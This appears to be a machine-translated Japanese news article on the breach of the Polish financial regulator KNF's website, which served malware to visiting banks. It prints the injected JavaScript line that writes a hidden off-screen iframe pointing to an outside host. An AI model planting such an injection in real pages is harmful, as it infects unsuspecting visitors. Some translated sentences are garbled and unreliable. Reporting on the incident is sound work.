詐欺師がポーランド政府のサイトにマルウェアを挿入してポーランドの銀行をハッキング

いくつかのポーランドの銀行は、従業員がポーランド金融監督庁のサイトを閲覧した後、彼らのシステムがマルウェアに感染していることを確認しました。

ポーランドの銀行は、金融機関のいくつかのサーバーにマルウェアが発見された後、大規模なサイバー攻撃を調査しています。

サイバー攻撃は、先週の金曜日の地元のポーランドのニュースサイトZaufana Trzecia Stronaによって初めて報告されました。

この攻撃の興味深い面は、詐欺師がポーランドの金融監督機関であるポーランド金融監督局(KNF)を使ってマルウェアを広めたことです。

KNFのスポークスマンは、規制当局の内部システムが「他国からの」ハッカーによって侵害されたことを確認した。 攻撃者は、サーバー上で、ポーランドの銀行に対する攻撃で使用された悪質なファイルを削除しました。

マルウェアの拡散を避けるため、当局はKNFのネットワーク全体を「証拠を確保するために」閉鎖するという決定を下した。

マルウェアベースの攻撃は、現在セキュリティ侵害を調査中の多くの銀行によって確認されています。

銀行のITスタッフは、いくつかのサーバー上の実行可能ファイルの存在に関連した異常なトラフィックに気付きました。

「ポーランドの金融部門全域でSOCの忙しい週がありました。 ポーランドの20の商業銀行のうち、少なくともいくつかはマルウェア感染の犠牲者であることをすでに確認しており、他の人は見守っている。 誰も認識しない、サーバー上での風変りな場所へのネットワークトラフィックと暗号化された実行可能ファイルが最初の兆候でした」badcyber.comのWebサイトは「1週間前に銀行の1人が奇妙なマルウェアをいくつかのワークステーションに検出しました。 その情報をSIEMに情報提供を依頼し始めた他の銀行と情報を共有するために管理された妥協の基本指標を確立した。 いくつかのケースでは、結果は肯定的なものに戻った」

調査の最初の調査結果によると、KNFのウェブサイトが侵害され、サイトのJavaScriptファイルの1つが変更されました。

皮肉なことに、KNFは、ポーランドの銀行が採用した安全対策を監視し促進する規制機関です。

挿入されたJSファイルは、外部JSファイルをロードするKNFウェブサイトへの訪問者をもたらし、外部ファイルからマルウェアをダウンロードしてインストールしました。

権限のないコードへのアクセスは、以下のファイルに保存されています。

http://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11

このように見えます:

document.write("<div id='efHpTk' width='0px' height='0px'><iframe name='forma' src='https://sap.misapor
.ch/vishop/view.jsp?pagenum=1' width='145px' height='146px' style='left:-2144px;position:absolute;top
:0px;'></iframe></div>");

私が書いていたとき、KNFとポーランド政府は、犯人が銀行から金を盗んだという兆候はないことを確認しました。

「これらの攻撃に関連する情報、銀行口座から資金を盗む試みの成功または失敗、それほど重要な情報はありません。 これは、攻撃者の目標がお金ではなく情報であることを示している可能性があります」と、地元のメディアであるzaufanatrzeciastrona.plが報告しています。 少なくとも1つのケースでは、大量のデータが銀行のネットワークから外部サーバに転送されていることがわかっていますが、犯罪者が出荷する前にデータが盗まれたものを特定するために、 難しい。 ”

ユニークなことは、その事件が、同国の金融部門で最大のシステムハッキングと考えられることです。

IOCはbadcyber.comのWebサイトで入手できます。

参照:

Crooks hacked Polish banks with a malware planted on Government site

Be the first to comment

コメントをお寄せください

ご登録いただいたメールアドレスは公開されません。


*